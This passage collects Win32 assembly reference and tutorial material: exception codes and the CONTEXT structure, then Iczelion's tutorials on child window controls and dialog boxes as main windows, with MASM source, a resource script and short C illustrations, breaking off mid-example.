STATUS_ARRAY_BOUNDS_EXCEEDED    = 0C000008Ch
STATUS_FLOAT_DENORMAL_OPERAND   = 0C000008Dh
STATUS_FLOAT_DIVIDE_BY_ZERO     = 0C000008Eh
STATUS_FLOAT_INEXACT_RESULT     = 0C000008Fh
STATUS_FLOAT_INVALID_OPERATION  = 0C0000090h
STATUS_FLOAT_OVERFLOW           = 0C0000091h
STATUS_FLOAT_STACK_CHECK        = 0C0000092h
STATUS_FLOAT_UNDERFLOW          = 0C0000093h
STATUS_INTEGER_DIVIDE_BY_ZERO   = 0C0000094h
STATUS_INTEGER_OVERFLOW         = 0C0000095h
STATUS_PRIVILEGED_INSTRUCTION   = 0C0000096h
STATUS_STACK_OVERFLOW           = 0C00000FDh
STATUS_CONTROL_C_EXIT           = 0C000013Ah
STATUS_FLOAT_MULTIPLE_FAULTS    = 0C00002B4h
STATUS_FLOAT_MULTIPLE_TRAPS     = 0C00002B5h
STATUS_ILLEGAL_VLM_REFERENCE    = 0C00002C0h

Context flags:
--------------

CONTEXT_i386               = 000010000h
CONTEXT_i486               = 000010000h

CONTEXT_CONTROL            = (CONTEXT_i386 or 1)  ; SS:ESP, CS:EIP, EFLAGS, EBP
CONTEXT_INTEGER            = (CONTEXT_i386 or 2)  ; EAX, EBX,..., ESI, EDI
CONTEXT_SEGMENTS           = (CONTEXT_i386 or 4)  ; DS, ES, FS, GS
CONTEXT_FLOATING_POINT     = (CONTEXT_i386 or 8)  ; 387 state
CONTEXT_DEBUG_REGISTERS    = (CONTEXT_i386 or 16) ; DB 0-3,6,7
CONTEXT_EXTENDED_REGISTERS = (CONTEXT_i386 or 32) ; cpu specific extensions

CONTEXT_FULL               = (CONTEXT_CONTROL or CONTEXT_INTEGER or\
                              CONTEXT_SEGMENTS)
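
To make the flag arithmetic concrete, here is a small C sketch that repeats
the values listed above and adds a helper for testing them. The helper
context_has is a hypothetical name introduced for illustration; it is not a
Win32 function.

```c
#include <assert.h>

/* Values copied from the list above. */
enum {
    CONTEXT_i386               = 0x00010000,
    CONTEXT_CONTROL            = CONTEXT_i386 | 0x01,
    CONTEXT_INTEGER            = CONTEXT_i386 | 0x02,
    CONTEXT_SEGMENTS           = CONTEXT_i386 | 0x04,
    CONTEXT_FLOATING_POINT     = CONTEXT_i386 | 0x08,
    CONTEXT_DEBUG_REGISTERS    = CONTEXT_i386 | 0x10,
    CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20,
    CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS
};

/* Nonzero when every bit of `wanted` is present in `flags`. */
int context_has(unsigned long flags, unsigned long wanted)
{
    assert(wanted != 0);
    return (flags & wanted) == wanted;
}
```

CONTEXT_FULL works out to 000010007h, so it covers the control, integer and
segment registers but not the floating point or debug register state.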

Context structure:
------------------

struc CONTEXT
         ContextFlags      dd ?  ; CONTEXT_??? flags

         Dr0               dd ?  ; Debug registers
         Dr1               dd ?
         Dr2               dd ?
         Dr3               dd ?
         Dr6               dd ?
         Dr7               dd ?

         ControlWord       dd ?  ; FPU context
         StatusWord        dd ?
         TagWord           dd ?
         ErrorOffset       dd ?
         ErrorSelector     dd ?
         DataOffset        dd ?
         DataSelector      dd ?
         RegisterArea      dt 8 dup (?)
         Cr0NpxState       dd ?

         SegGs             dd ?  ; Segment registers
         SegFs             dd ?
         SegEs             dd ?
         SegDs             dd ?

         Edi               dd ?  ; Integer registers
         Esi               dd ?
         Ebx               dd ?
         Edx               dd ?
         Ecx               dd ?
         Eax               dd ?

         Ebp               dd ?  ; Control registers
         Eip               dd ?
         SegCs             dd ?
         EFlags            dd ?
         Esp               dd ?
         SegSs             dd ?

         ExtendedRegisters db 512 dup (?)
ends

Additional word
---------------
This article was posted on comp.lang.asm.x86.
Special thanks to Michael Tippach for pointing out some exception flags.
My web page is at http://ams.ampr.org/cdragan/



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                           Child Window Controls
                                                           by Iczelion


In this tutorial, we will explore child window controls which are very
important input and output devices of our programs.

Theory
------
Windows provides several predefined window classes which we can readily use
in our own programs. Most of the time we use them as components of a dialog
box, so they're usually called child window controls. The child window
controls process their own mouse and keyboard messages and notify the
parent window when their states have changed. They relieve programmers of
an enormous burden, so you should use them as much as possible. In this
tutorial, I put them on a normal window just to demonstrate how you can
create and use them, but in reality you should put them in a dialog box.
Examples of predefined window classes are button, listbox, checkbox, radio
button, edit, etc.

In order to use a child window control, you must create it with
CreateWindow or CreateWindowEx. Note that you don't have to register the
window class since it's registered for you by Windows. The class name
parameter MUST be the predefined class name. Say, if you want to create a
button, you must specify "button" as the class name in CreateWindowEx. The
other parameters you must fill in are the parent window handle and the
control ID. The control ID must be unique among the controls of the same
parent; you use it to differentiate between them.

After the control is created, it sends messages notifying the parent
window when its state has changed. Normally, you create the child windows
during the WM_CREATE message of the parent window. The child window sends
WM_COMMAND messages to the parent window with its control ID in the low
word of wParam, the notification code in the high word of wParam, and its
window handle in lParam. Each child window control has different
notification codes; refer to your Win32 API reference for more information.

The parent window can send commands to the child windows too, by calling
the SendMessage function. SendMessage sends the specified message, with
accompanying values in wParam and lParam, to the window specified by the
window handle. It's an extremely useful function since it can send messages
to any window provided you know its window handle.

So, after creating the child windows, the parent window must process
WM_COMMAND messages to be able to receive notification codes from the child
windows.

Application
-----------
We will create a window which contains an edit control and a pushbutton.
When you click the button, a message box will appear showing the text you
typed in the edit box. There is also a menu with 4 menu items:

   1. Say Hello  -- Put a text string into the edit box
   2. Clear Edit Box -- Clear the content of the edit box
   3. Get Text -- Display a message box with the text in the edit box
   4. Exit -- Close the program.

.386
.model flat,stdcall
option casemap:none

WinMain proto :DWORD,:DWORD,:DWORD,:DWORD

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

.data
ClassName db "SimpleWinClass",0
AppName  db "Our First Window",0
MenuName db "FirstMenu",0
ButtonClassName db "button",0
ButtonText db "My First Button",0
EditClassName db "edit",0
TestString db "Wow! I'm in an edit box now",0

.data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
hwndButton HWND ?
hwndEdit HWND ?
buffer db 512 dup(?)          ; buffer to store the text retrieved from the edit box

.const
ButtonID equ 1                ; The control ID of the button control
EditID equ 2                  ; The control ID of the edit control
IDM_HELLO equ 1
IDM_CLEAR equ 2
IDM_GETTEXT equ 3
IDM_EXIT equ 4

.code
start:
     invoke GetModuleHandle, NULL
     mov    hInstance,eax
     invoke GetCommandLine
     mov    CommandLine,eax
     invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
     invoke ExitProcess,eax

WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
     LOCAL wc:WNDCLASSEX
     LOCAL msg:MSG
     LOCAL hwnd:HWND
     mov   wc.cbSize,SIZEOF WNDCLASSEX
     mov   wc.style, CS_HREDRAW or CS_VREDRAW
     mov   wc.lpfnWndProc, OFFSET WndProc
     mov   wc.cbClsExtra,NULL
     mov   wc.cbWndExtra,NULL
     push  hInst
     pop   wc.hInstance
     mov   wc.hbrBackground,COLOR_BTNFACE+1
     mov   wc.lpszMenuName,OFFSET MenuName
     mov   wc.lpszClassName,OFFSET ClassName
     invoke LoadIcon,NULL,IDI_APPLICATION
     mov   wc.hIcon,eax
     mov   wc.hIconSm,eax
     invoke LoadCursor,NULL,IDC_ARROW
     mov   wc.hCursor,eax
     invoke RegisterClassEx, addr wc
     invoke CreateWindowEx,WS_EX_CLIENTEDGE,ADDR ClassName, \
                         ADDR AppName, WS_OVERLAPPEDWINDOW,\
                         CW_USEDEFAULT, CW_USEDEFAULT,\
                         300,200,NULL,NULL, hInst,NULL
     mov   hwnd,eax
     invoke ShowWindow, hwnd,SW_SHOWNORMAL
     invoke UpdateWindow, hwnd
     .WHILE TRUE
         invoke GetMessage, ADDR msg,NULL,0,0
         .BREAK .IF (!eax)
         invoke TranslateMessage, ADDR msg
         invoke DispatchMessage, ADDR msg
     .ENDW
     mov     eax,msg.wParam
     ret
WinMain endp

WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
     .IF uMsg==WM_DESTROY
         invoke PostQuitMessage,NULL
     .ELSEIF uMsg==WM_CREATE
         invoke CreateWindowEx,WS_EX_CLIENTEDGE, ADDR EditClassName,NULL,\
                         WS_CHILD or WS_VISIBLE or WS_BORDER or ES_LEFT or\
                         ES_AUTOHSCROLL,\
                         50,35,200,25,hWnd,EditID,hInstance,NULL
         mov  hwndEdit,eax
         invoke SetFocus, hwndEdit
         invoke CreateWindowEx,NULL, ADDR ButtonClassName,ADDR ButtonText,\
                         WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON,\
                         75,70,140,25,hWnd,ButtonID,hInstance,NULL
         mov  hwndButton,eax
     .ELSEIF uMsg==WM_COMMAND
         mov eax,wParam
         .IF lParam==0
             .IF ax==IDM_HELLO
                 invoke SetWindowText,hwndEdit,ADDR TestString
             .ELSEIF ax==IDM_CLEAR
                 invoke SetWindowText,hwndEdit,NULL
             .ELSEIF  ax==IDM_GETTEXT
                 invoke GetWindowText,hwndEdit,ADDR buffer,512
                 invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
             .ELSE
                 invoke DestroyWindow,hWnd
             .ENDIF
         .ELSE
             .IF ax==ButtonID
                 shr eax,16
                 .IF ax==BN_CLICKED
                     invoke SendMessage,hWnd,WM_COMMAND,IDM_GETTEXT,0
                 .ENDIF
             .ENDIF
         .ENDIF
     .ELSE
         invoke DefWindowProc,hWnd,uMsg,wParam,lParam
         ret
     .ENDIF
     xor    eax,eax
     ret
WndProc endp
end start

Analysis:

Let's analyze the program.

          .ELSEIF uMsg==WM_CREATE
              invoke CreateWindowEx,WS_EX_CLIENTEDGE, \
                              ADDR EditClassName,NULL,\
                              WS_CHILD or WS_VISIBLE or WS_BORDER or\
                              ES_LEFT or ES_AUTOHSCROLL,\
                              50,35,200,25,hWnd,EditID,hInstance,NULL
              mov  hwndEdit,eax
              invoke SetFocus, hwndEdit
              invoke CreateWindowEx,NULL, ADDR ButtonClassName,\
                              ADDR ButtonText,\
                              WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON,\
                              75,70,140,25,hWnd,ButtonID,hInstance,NULL
              mov  hwndButton,eax

We create the controls while processing the WM_CREATE message. We call
CreateWindowEx with an extended window style, WS_EX_CLIENTEDGE, which makes
the client area of the edit control look sunken. The class name of each
control is a predefined one: "edit" for the edit control, "button" for the
button control. Next we specify the child window's styles. Each control has
extra styles in addition to the normal window styles. For example, the
button styles are prefixed with "BS_" for "button style", and edit styles are
prefixed with "ES_" for "edit style". You have to look these styles up in a
Win32 API reference. Note that you put a control ID in place of the menu
handle. This doesn't cause any harm since a child window control cannot have
a menu.

After creating each control, we keep its handle in a variable for future
use.

SetFocus is called to give input focus to the edit box so the user can type
the text into it immediately.

Now comes the really exciting part. Every child window control sends
notification to its parent window with WM_COMMAND.

     .ELSEIF uMsg==WM_COMMAND
         mov eax,wParam
         .IF lParam==0

Recall that a menu also sends WM_COMMAND messages to notify the window
about its state. How can you differentiate between WM_COMMAND messages
originating from a menu and those from a control? Below is the answer:

          Low word of wParam   High word of wParam    lParam
  Menu    Menu ID              0                      0
  Control Control ID           Notification code      Child Window Handle

You can see that you should check lParam. If it's zero, the current
WM_COMMAND message is from a menu. You cannot use wParam to differentiate
between a menu and a control since the menu ID and control ID may be
identical and the notification code may be zero.
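
The table can be turned into a small decoding routine. The following C sketch
is only an illustration: LO_WORD and HI_WORD are stand-ins for the Win32
LOWORD/HIWORD macros so that the code builds without windows.h, and
decode_command and its types are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

/* Stand-ins for the Win32 LOWORD/HIWORD macros. */
#define LO_WORD(x) ((uint16_t)((uintptr_t)(x) & 0xFFFFu))
#define HI_WORD(x) ((uint16_t)(((uintptr_t)(x) >> 16) & 0xFFFFu))

enum command_source { FROM_MENU, FROM_CONTROL };

struct command {
    enum command_source source;
    uint16_t id;       /* menu ID or control ID */
    uint16_t notify;   /* notification code (0 for a menu) */
};

/* Split the WM_COMMAND parameters the way the table describes. */
struct command decode_command(uintptr_t wparam, intptr_t lparam)
{
    struct command c;
    c.source = (lparam == 0) ? FROM_MENU : FROM_CONTROL;  /* lParam decides */
    c.id     = LO_WORD(wparam);
    c.notify = HI_WORD(wparam);
    return c;
}
```

Only lParam is consulted to decide the source, because a menu item and a
control may share the same ID, as IDM_HELLO and ButtonID do in this program.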

             .IF ax==IDM_HELLO
                 invoke SetWindowText,hwndEdit,ADDR TestString
             .ELSEIF ax==IDM_CLEAR
                 invoke SetWindowText,hwndEdit,NULL
             .ELSEIF  ax==IDM_GETTEXT
                 invoke GetWindowText,hwndEdit,ADDR buffer,512
                 invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK


You can put a text string into an edit box by calling SetWindowText. You
clear the content of an edit box by calling SetWindowText with NULL.
SetWindowText is a general purpose API function. You can use SetWindowText
to change the caption of a window or the text on a button.
To get the text in an edit box, you use GetWindowText.

             .IF ax==ButtonID
                 shr eax,16
                 .IF ax==BN_CLICKED
                     invoke SendMessage,hWnd,WM_COMMAND,IDM_GETTEXT,0
                 .ENDIF
             .ENDIF

The above code snippet deals with the case where the user presses the
button. First, it checks the low word of wParam to see if the control ID
matches that of the button. If it does, it checks the high word of wParam to
see if it is the notification code BN_CLICKED, which is sent when the button
is clicked.

The interesting part is after it's certain that the notification code is
BN_CLICKED. We want to get the text from the edit box and display it in a
message box. We can duplicate the code in the IDM_GETTEXT section above but
it doesn't make sense. If we can somehow send a WM_COMMAND message with the
low word of wParam containing the value IDM_GETTEXT to our own window
procedure, we can avoid code duplication and simplify our program.

The SendMessage function is the answer. This function sends any message to
any window with any wParam and lParam we want. So instead of duplicating the
code, we call SendMessage with the parent window handle, WM_COMMAND,
IDM_GETTEXT, and 0. This has the same effect as selecting the "Get Text"
menu item from the menu. The window procedure doesn't perceive any
difference between the two.

You should use this technique as much as possible to make your code more
organized.

Last but not least, do not forget the TranslateMessage function in the
message loop. Since you must type in some text into the edit box, your
program must translate raw keyboard input into readable text. If you omit
this function, you will not be able to type anything into your edit box.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                       Dialog Box as Main Window
                                                       by Iczelion


Now comes the really interesting part about GUI, the dialog box. In this
tutorial (and the next), we will learn how to use a dialog box as our main
window.

Theory
------
If you play with the example in the previous tutorial long enough, you'll
find out that you cannot change input focus from one child window control
to another with the Tab key. The only way to do that is to click the control
you want to give input focus to. This situation is rather cumbersome. There
is a way to get around this problem but it's not easy: you have to subclass
all child window controls in your parent window. Another thing you might
notice is that I changed the background color of the parent window to gray
instead of the normal white used in previous examples. This is done so that
the color of the child window controls blends seamlessly with the color of
the client area of the parent window.

The reason why such inconvenience exists is that child window controls are
originally designed to work with a dialog box, not a normal window. The
default color of child window controls such as a button is gray because the
client area of a dialog box is normally gray so they blend into each other
without any sweat on the programmer's part.

Before we get deep into the details, we should first know what a dialog box
is. A dialog box is nothing more than a normal window designed to work with
child window controls. Windows also provides an internal "dialog box
manager" which is responsible for most of the keyboard logic, such as
shifting input focus when the user presses Tab or pressing the default
pushbutton when the Enter key is pressed, so programmers can deal with
higher-level tasks. Dialog boxes are primarily used as input/output devices.
As such, a dialog box can be considered an input/output "black box": you
don't have to know how a dialog box works internally in order to use it, you
only have to know how to interact with it. That's a principle of object
oriented programming (OOP) called information hiding. If the black box is
*perfectly* designed, the user can make use of it without any knowledge of
how it operates. The catch is that the black box must be perfect, which is
hard to achieve in the real world. The Win32 API is also designed as a black
box.

Well, it seems we have strayed from our path. Let's get back to our
subject. Dialog boxes are designed to reduce the programmer's workload.
Normally if you put child window controls on a normal window, you have to
subclass them and write the keyboard logic yourself. But if you put them on
a dialog box, it will handle the logic for you. You only have to know how
to get the user input from the dialog box or how to send commands to it.

A dialog box is defined as a resource in much the same way as a menu. You
write a dialog box template describing the characteristics of the dialog
box and its controls and then compile the resource script with a resource
compiler.

Note that all resources are put together in the same resource script file.
You can use any text editor to write a dialog box template but I don't
recommend it. You should use a resource editor to do the job visually since
arranging child window controls on a dialog box is hard to do manually.
Several excellent resource editors are available. Most of the major
compiler suites include their own resource editors. You can use them to
create a resource script for your program and then cut out irrelevant lines
such as those related to MFC.

There are two main types of dialog box: modal and modeless. A modeless
dialog box lets you change input focus to another window. An example is the
Find dialog of MS Word. There are two subtypes of modal dialog box:
application modal and system modal. An application modal dialog box doesn't
let you change input focus to another window in the same application, but
you can change the input focus to a window of ANOTHER application. A system
modal dialog box doesn't allow you to change input focus to any other
window until you respond to it first.

A modeless dialog box is created by calling the CreateDialogParam API
function. A modal dialog box is created by calling DialogBoxParam. The only
distinction between an application modal dialog box and a system modal one
is the DS_SYSMODAL style. If you include DS_SYSMODAL style in a dialog box
template, that dialog box will be a system modal one.

You can communicate with any child window control on a dialog box by using
SendDlgItemMessage function. Its syntax is like this:


      SendDlgItemMessage proto hwndDlg:DWORD,\
                               idControl:DWORD,\
                               uMsg:DWORD,\
                               wParam:DWORD,\
                               lParam:DWORD


This API call is immensely useful for interacting with a child window
control. For example, if you want to get the text from an edit control, you
can do this:

      invoke SendDlgItemMessage, hDlg, ID_EDITBOX, WM_GETTEXT, 256,\
                                 ADDR text_buffer

In order to know which message to send, you should consult your Win32 API
reference.

Windows also provides several control-specific API functions to get and set
data quickly, for example GetDlgItemText, CheckDlgButton etc. These
control-specific functions are provided for the programmer's convenience so
you don't have to look up the meanings of wParam and lParam for each
message. Normally, you should use control-specific API calls when they're
available since they make source code maintenance easier. Resort to
SendDlgItemMessage only if no control-specific API calls are available.

The Windows dialog box manager sends some messages to a specialized
callback function called a dialog box procedure which has the following
format:

      DlgProc  proto hDlg:DWORD ,\
                     iMsg:DWORD ,\
                     wParam:DWORD ,\
                     lParam:DWORD

The dialog box procedure is very similar to a window procedure except for
the type of the return value, which is TRUE/FALSE instead of LRESULT. The
internal dialog box manager inside Windows IS the true window procedure for
the dialog box. It calls our dialog box procedure with some of the messages
that it receives. So the general rule of thumb is: if our dialog box
procedure processes a message, it MUST return TRUE in eax, and if it does
not process the message, it must return FALSE in eax. Note that a dialog
box procedure doesn't pass the messages it does not process to
DefWindowProc since it's not a real window procedure.
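
The TRUE/FALSE contract can be modelled in a few lines of portable C. This
is only a sketch: dlg_proc and dialog_manager are hypothetical names, and
dialog_manager is a toy stand-in for what Windows does internally, not its
real implementation. The message numbers are the usual Win32 values,
repeated here so the sketch compiles without windows.h.

```c
#include <stdbool.h>

/* Win32 message numbers, copied so no Windows header is needed. */
enum { WM_CLOSE = 0x0010, WM_INITDIALOG = 0x0110, WM_COMMAND = 0x0111 };

/* Hypothetical dialog procedure: true means "I processed the message",
   false means "I did not". It never calls DefWindowProc itself. */
bool dlg_proc(unsigned msg)
{
    switch (msg) {
    case WM_INITDIALOG:
    case WM_COMMAND:
        return true;
    default:
        return false;
    }
}

/* Toy model of the dialog box manager, which is the real window
   procedure. It runs its own default handling only when the dialog
   procedure reports false. Returns true if the default handling ran. */
bool dialog_manager(unsigned msg)
{
    if (dlg_proc(msg))
        return false;   /* handled by our procedure, nothing more to do */
    /* default processing would take place here */
    return true;
}
```

In this model WM_COMMAND stops at dlg_proc, while WM_CLOSE, which dlg_proc
ignores, is left to the manager's default handling.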


There are two distinct uses of a dialog box. You can use it as the main
window of your application or use it as an input device. We'll examine the
first approach in this tutorial.

"Using a dialog box as main window" can be interpreted in two different
senses.

   1. You can use the dialog box template as a class template which you
      register with RegisterClassEx call. In this case, the dialog box
      behaves like a "normal" window: it receives messages via a window
      procedure referred to by lpfnWndProc member of the window class, not
      via a dialog box procedure. The benefit of this approach is that you
      don't have to create child window controls yourself, Windows creates
      them for you when the dialog box is created. Also Windows handles the
      keyboard logic for you such as Tab order etc. Plus you can specify the
      cursor and icon of your window in the window class structure.
   2. Your program just creates the dialog box without creating any parent
      window. This approach makes a message loop unnecessary since the
      messages are sent directly to the dialog box procedure. You don't even
      have to register a window class!

This tutorial is going to be a long one. I'll present the first approach
followed by the second.

Application
-----------

   ------------------------------------------------------------------------
                                  dialog.asm
   ------------------------------------------------------------------------

.386
.model flat,stdcall
option casemap:none
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

.data
ClassName db "DLGCLASS",0
MenuName db "MyMenu",0
DlgName db "MyDialog",0
AppName db "Our First Dialog Box",0
TestString db "Wow! I'm in an edit box now",0

.data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
buffer db 512 dup(?)

.const
IDC_EDIT        equ 3000
IDC_BUTTON      equ 3001
IDC_EXIT        equ 3002
IDM_GETTEXT     equ 32000
IDM_CLEAR       equ 32001
IDM_EXIT        equ 32002

.code
start:
     invoke GetModuleHandle, NULL
     mov    hInstance,eax
     invoke GetCommandLine
     mov    CommandLine,eax
     invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
     invoke ExitProcess,eax

WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
     LOCAL wc:WNDCLASSEX
     LOCAL msg:MSG
     LOCAL hDlg:HWND
     mov   wc.cbSize,SIZEOF WNDCLASSEX
     mov   wc.style, CS_HREDRAW or CS_VREDRAW
     mov   wc.lpfnWndProc, OFFSET WndProc
     mov   wc.cbClsExtra,NULL
     mov   wc.cbWndExtra,DLGWINDOWEXTRA
     push  hInst
     pop   wc.hInstance
     mov   wc.hbrBackground,COLOR_BTNFACE+1
     mov   wc.lpszMenuName,OFFSET MenuName
     mov   wc.lpszClassName,OFFSET ClassName
     invoke LoadIcon,NULL,IDI_APPLICATION
     mov   wc.hIcon,eax
     mov   wc.hIconSm,eax
     invoke LoadCursor,NULL,IDC_ARROW
     mov   wc.hCursor,eax
     invoke RegisterClassEx, addr wc
     invoke CreateDialogParam,hInstance,ADDR DlgName,NULL,NULL,NULL
     mov   hDlg,eax
     invoke ShowWindow, hDlg,SW_SHOWNORMAL
     invoke UpdateWindow, hDlg
     invoke GetDlgItem,hDlg,IDC_EDIT
     invoke SetFocus,eax
     .WHILE TRUE
         invoke GetMessage, ADDR msg,NULL,0,0
         .BREAK .IF (!eax)
         invoke IsDialogMessage, hDlg, ADDR msg
         .IF eax ==FALSE
             invoke TranslateMessage, ADDR msg
             invoke DispatchMessage, ADDR msg
         .ENDIF
     .ENDW
     mov     eax,msg.wParam
     ret
WinMain endp

WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
     .IF uMsg==WM_DESTROY
         invoke PostQuitMessage,NULL
     .ELSEIF uMsg==WM_COMMAND
         mov eax,wParam
         .IF lParam==0
             .IF ax==IDM_GETTEXT
                 invoke GetDlgItemText,hWnd,IDC_EDIT,ADDR buffer,512
                 invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
             .ELSEIF ax==IDM_CLEAR
                 invoke SetDlgItemText,hWnd,IDC_EDIT,NULL
             .ELSE
                 invoke DestroyWindow,hWnd
             .ENDIF
         .ELSE
             mov edx,wParam
             shr edx,16
             .IF dx==BN_CLICKED
                 .IF ax==IDC_BUTTON
                     invoke SetDlgItemText,hWnd,IDC_EDIT,ADDR TestString
                 .ELSEIF ax==IDC_EXIT
                     invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
                 .ENDIF
             .ENDIF
         .ENDIF
     .ELSE
         invoke DefWindowProc,hWnd,uMsg,wParam,lParam
         ret
     .ENDIF
     xor    eax,eax
     ret
WndProc endp
end start
   ------------------------------------------------------------------------
                                  Dialog.rc
   ------------------------------------------------------------------------

#include "resource.h"

#define IDC_EDIT        3000
#define IDC_BUTTON      3001
#define IDC_EXIT        3002

#define IDM_GETTEXT     32000
#define IDM_CLEAR       32001
#define IDM_EXIT        32002


MyDialog DIALOG 10, 10, 205, 60
STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX |
WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK
CAPTION "Our First Dialog Box"
CLASS "DLGCLASS"
BEGIN
     EDITTEXT         IDC_EDIT,   15,17,111,13, ES_AUTOHSCROLL | ES_LEFT
     DEFPUSHBUTTON   "Say Hello", IDC_BUTTON,    141,10,52,13
     PUSHBUTTON      "E&xit", IDC_EXIT,  141,26,52,13, WS_GROUP
END


MyMenu  MENU
BEGIN
     POPUP "Test Controls"
     BEGIN
         MENUITEM "Get Text", IDM_GETTEXT
         MENUITEM "Clear Text", IDM_CLEAR
         MENUITEM SEPARATOR
         MENUITEM "E&xit", IDM_EXIT
     END
END

Analysis
--------

Let's analyze this first example.
This example shows how to register a dialog template as a window class and
create a "window" from that class. It simplifies your program since you
don't have to create the child window controls yourself.
Let's first analyze the dialog template.

MyDialog DIALOG 10, 10, 205, 60

Declare the name of a dialog, in this case, "MyDialog" followed by the
keyword "DIALOG". The following four numbers are: x, y , width, and height
of the dialog box in dialog box units (not the same as pixels).
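
Because template coordinates are not pixels, a conversion is sometimes
handy. The C sketch below applies the usual relation: one horizontal dialog
unit is a quarter of the horizontal base unit and one vertical dialog unit
is an eighth of the vertical base unit. The function names are made up for
illustration, and the base units are passed in as parameters because they
depend on the dialog font; in a real program they would come from
GetDialogBaseUnits, or the whole conversion would be left to MapDialogRect.

```c
/* Convert dialog template units to pixels. base_x and base_y are the
   dialog base units in pixels (average character width and character
   height of the dialog font). Results are rounded to the nearest pixel;
   inputs are assumed to be non-negative. */
int dlu_to_px_x(int dlu, int base_x) { return (dlu * base_x + 2) / 4; }
int dlu_to_px_y(int dlu, int base_y) { return (dlu * base_y + 4) / 8; }
```

With assumed base units of 8 by 16 pixels, the 205 x 60 dialog above would
come out at 410 x 120 pixels.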

STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX |
WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK

Declare the styles of the dialog box.

CAPTION "Our First Dialog Box"

This is the text that will appear in the dialog box's title bar.

CLASS "DLGCLASS"

This line is crucial. It's this CLASS keyword that allows us to use the
dialog box template as a window class. Following the keyword is the name of
the "window class".

BEGIN
     EDITTEXT         IDC_EDIT,   15,17,111,13, ES_AUTOHSCROLL | ES_LEFT
     DEFPUSHBUTTON   "Say Hello", IDC_BUTTON,    141,10,52,13
     PUSHBUTTON      "E&xit", IDC_EXIT,  141,26,52,13, WS_GROUP
END

The above block defines the child window controls in the dialog box.
They're defined between BEGIN and END keywords. Generally the syntax is as
follows:

      control-type  "text"   ,controlID, x, y, width, height [,styles]

The control types are resource compiler keywords, so consult the resource
compiler manual for the full list.

Now we go to the assembly source code. The interesting part is in the
window class structure:

      mov   wc.cbWndExtra,DLGWINDOWEXTRA
      mov   wc.lpszClassName,OFFSET ClassName

Normally, cbWndExtra is left NULL, but if we want to register a dialog box
template as a window class, we must set this member to the value
DLGWINDOWEXTRA. Note that the name of the class must be identical to the
one following the CLASS keyword in the dialog box template. The remaining
members are initialized as usual. After you fill in the window class
structure, register it with RegisterClassEx. Seem familiar? This is the
same routine you have to go through in order to register a normal window
class.

      invoke CreateDialogParam,hInstance,ADDR DlgName,NULL,NULL,NULL

After registering the "window class", we create our dialog box. In this
example, I create it as a modeless dialog box with CreateDialogParam
function. This function takes 5 parameters but you only have to fill in the
first two: the instance handle and the pointer to the name of the dialog
box template. Note that the 2nd parameter is not a pointer to the class
name.

At this point, the dialog box and its child window controls are created by
Windows. Your window procedure will receive WM_CREATE message as usual.

      invoke GetDlgItem,hDlg,IDC_EDIT
      invoke SetFocus,eax

After the dialog box is created, I want to set the input focus to the edit
control. If I put this code in the WM_CREATE section, the GetDlgItem call
will fail since at that time the child window controls are not created yet.
The only way to do this is to call it after the dialog box and all its
child window controls are created, so I put these two lines after the
UpdateWindow call. The GetDlgItem function takes a control ID and returns
the associated control's window handle. This is how you can get a window
handle if you know its control ID.

         invoke IsDialogMessage, hDlg, ADDR msg
         .IF eax ==FALSE
             invoke TranslateMessage, ADDR msg
             invoke DispatchMessage, ADDR msg
         .ENDIF

The program enters the message loop and, before we translate and dispatch
messages, we call the IsDialogMessage function to let the dialog box
manager handle the keyboard logic of our dialog box for us. If this
function returns TRUE, the message was intended for the dialog box and has
been processed by the dialog box manager. Note another difference from the
previous tutorial. When the window procedure wants to get the text from the
edit control, it calls the GetDlgItemText function instead of
GetWindowText. GetDlgItemText accepts a control ID instead of a window
handle, which makes the call easier when you use a dialog box.
   ------------------------------------------------------------------------

Now let's go to the second approach to using a dialog box as a main window.
In the next example, I'll create an application modal dialog box. You won't
find a message loop or a window procedure because they're not necessary!
   ------------------------------------------------------------------------
                             dialog.asm (part 2)
   ------------------------------------------------------------------------

.386
.model flat,stdcall
option casemap:none

DlgProc proto :DWORD,:DWORD,:DWORD,:DWORD

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

.data
DlgName db "MyDialog",0
AppName db "Our Second Dialog Box",0
TestString db "Wow! I'm in an edit box now",0

.data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
buffer db 512 dup(?)

.const
